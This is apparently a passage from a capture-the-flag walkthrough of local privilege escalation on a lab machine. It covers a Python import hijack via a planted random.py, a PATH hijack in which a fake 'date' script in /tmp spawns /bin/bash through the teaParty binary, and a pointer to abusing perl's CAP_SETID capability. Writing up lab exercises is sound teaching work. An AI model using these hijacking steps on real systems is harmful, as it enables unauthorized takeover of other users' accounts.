Using the first command we can see the path it follows, we can see the first thing it will try is the current directory so we can make a random.py script of our own and put anything we want in it.
I opened the file in Ghidra and can see that the program is running the date command which we see outputted when we run the script. But note that the date command isn't using the full path so if we add somewhere else in our path we can run our own date command instead.
I added tmp to my path
Victim(rabbit)
echo $PATH
export PATH=/tmp:$PATH
echo $PATH
I'm not the hatter
Victim(rabbit)
cd /tmp
echo '#!/bin/bash' > date
echo '/bin/bash' >> date
chmod +x date
cat date
/home/rabbit/teaParty
Privilege Escalation
Victim(hatter)
We can just follow what's under capabilities but only the last command as CAP_SETID is already set for perl.
